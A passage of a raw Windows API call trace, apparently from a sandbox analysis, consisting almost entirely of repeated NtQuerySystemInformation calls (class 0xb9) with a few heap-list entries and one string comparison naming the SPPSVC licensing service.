(SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.542] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.543] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.544] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.544] RtlpHeapRemoveListEntry () [0241.553] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.554] RtlpHeapRemoveListEntry () [0241.557] RtlpHeapRemoveListEntry () [0241.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.560] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.564] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.565] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.566] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.567] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.570] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.571] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.572] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.576] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.577] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.578] RtlpHeapRemoveListEntry () [0241.586] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.587] RtlpHeapRemoveListEntry () [0241.590] RtlpHeapRemoveListEntry () [0241.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0241.592] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.593] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.597] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.598] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.599] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0241.611] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.612] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.613] RtlpHeapRemoveListEntry () [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f440, Length=0x28, ResultLength=0x0) [0241.847] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f4c0, Length=0x50, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f3f0, Length=0x38, ResultLength=0x0) [0241.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x28, ResultLength=0x0) [0241.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f220, Length=0x28, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0241.850] NtQuerySystemInformation (SystemInformationClass=0xb9, 